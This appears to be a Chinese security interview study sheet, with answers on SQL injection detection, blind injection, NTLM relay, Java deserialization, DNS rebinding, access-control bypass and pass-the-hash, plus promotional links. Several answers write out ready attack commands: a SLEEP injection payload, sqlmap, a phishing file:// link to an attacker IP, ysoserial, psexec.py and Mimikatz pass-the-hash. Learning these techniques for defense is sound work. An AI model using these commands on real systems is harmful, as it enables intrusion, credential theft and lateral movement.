《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN
5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect
1. HTTPS流量分析(SQL注入识别)
题目:如何从HTTPS流量中识别SQL注入攻击?
答案:
- 解密方法:
-
浏览器导出SSLKEYLOGFILE,Wireshark配置TLS会话密钥。
-
解密后筛选HTTP流量,搜索
UNION SELECT
、SLEEP(
等关键词。
-
-
特征:异常长的URL参数、重复的单引号或注释符(如
--
)。 -
工具:Wireshark、Burp Suite历史记录分析。
2. 时间盲注利用
题目:某SQL注入点无回显但未过滤SLEEP()
,如何盲注获取数据库名长度?
答案:
-
Payload:
' AND IF(LENGTH(DATABASE())=8, SLEEP(5), 0)--
-
自动化工具:
sqlmap -u "目标URL" --technique=T --time-sec=5 --dbms=mysql
-
原理:通过响应时间差异判断条件真假。
3. NTLM Relay攻击
题目:内网中如何利用NTLM Relay攻击获取域控权限?
答案:
- 步骤:
-
使用Responder或Impacket监听SMB/LDAP请求。
-
触发目标机器向攻击者发送NTLM认证(如钓鱼链接
file://attackIP/恶意文件
)。 -
将NTLM Hash Relay到域控,执行命令(如添加用户)。
-
-
防御:启用SMB签名、限制NTLM使用。
4. 反序列化漏洞(RCE)
题目:某Java应用使用Apache Commons Collections 3.1,如何构造Payload实现RCE?
答案:
-
利用链:
InvokerTransformer
链触发Runtime执行命令。 -
工具:使用ysoserial生成Payload:
java -jar ysoserial.jar CommonsCollections5 "cmd.exe /c calc" > payload.bin
-
防御:升级依赖库、禁用危险反序列化类。
5. DNS Rebinding攻击
题目:解释DNS Rebinding攻击原理及防御方法。
答案:
-
原理:恶意网页通过短TTL域名绑定到内网IP,绕过同源策略攻击内网服务。
- 防御:
-
浏览器限制DNS解析缓存时间。
-
内网设备禁止响应外部DNS解析请求。
-
应用层校验Host头与请求来源IP。
-
6. 垂直越权漏洞
题目:某CMS管理后台通过/admin
路径判断权限,普通用户请求此路径返回403。如何绕过?
答案:
-
方法1:伪造Cookie或JWT令牌提升权限(如修改
role=admin
)。 -
方法2:直接访问后台API接口(如
/admin/addUser
),绕过前端路由校验。 -
防御:服务端校验用户角色、RBAC权限控制。
7. 内网横向移动(Pass the Hash)
题目:已获取内网某主机的NTLM Hash,如何横向移动到另一台主机?
答案:
- 工具:
-
psexec.py:
python psexec.py -hashes :<NTLM_Hash> DOMAIN/user@目标IP
-
Mimikatz:
sekurlsa::pth /user:Administrator /domain:test.com /ntlm:HASH
-
-
防御:启用LSA保护、限制管理员账户登录范围。